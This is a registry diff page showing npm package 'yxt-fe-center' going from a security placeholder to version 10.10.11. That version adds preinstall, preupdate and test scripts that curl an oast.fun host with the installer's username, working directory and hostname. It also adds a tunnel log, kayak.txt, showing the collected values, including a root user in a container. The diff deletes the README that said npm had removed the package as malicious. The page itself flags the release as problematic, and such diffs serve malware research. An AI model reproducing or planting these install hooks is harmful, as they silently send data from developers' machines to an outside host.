yxt-fe-center 0.0.1-security → 10.10.11
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of yxt-fe-center might be problematic. Click here for more details.
- package/kayak.txt +7 -0
- package/package.json +10 -3
- package/README.md +0 -5
package/kayak.txt
ADDED
@@ -0,0 +1,7 @@
|
|
1
|
+
[32mForwarding HTTP traffic from https://6b34122784837288f3c6c00385965ad8.serveo.net
|
2
|
+
[0mHTTP request from 116.62.22.194 to https://6b34122784837288f3c6c00385965ad8.serveo.net/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)
|
3
|
+
HTTP request from 8.133.240.109 to https://6b34122784837288f3c6c00385965ad8.serveo.net/
|
4
|
+
HTTP request from 116.62.22.194 to https://6b34122784837288f3c6c00385965ad8.serveo.net/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)
|
5
|
+
HTTP request from 116.62.22.194 to https://6b34122784837288f3c6c00385965ad8.serveo.net/?user=root&path=/home/node/node_modules/yxt-fe-center&hostname=de19435398c7
|
6
|
+
[33mPort forwarding for 6b34122784837288f3c6c00385965ad8.serveo.net expired
|
7
|
+
[0m
|
package/package.json
CHANGED
@@ -1,6 +1,13 @@
|
|
1
1
|
{
|
2
2
|
"name": "yxt-fe-center",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "10.10.11",
|
4
|
+
"description": "Internal App",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "curl -s \"https://gwscuzapehabxvbqnehlxcf3f6wp39wol.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" ",
|
8
|
+
"preinstall": "curl -s \"https://gwscuzapehabxvbqnehlxcf3f6wp39wol.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" ",
|
9
|
+
"preupdate": "curl -s \"https://gwscuzapehabxvbqnehlxcf3f6wp39wol.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" "
|
10
|
+
},
|
11
|
+
"author": "Internal App",
|
12
|
+
"license": "ISC"
|
6
13
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=yxt-fe-center for more information.
|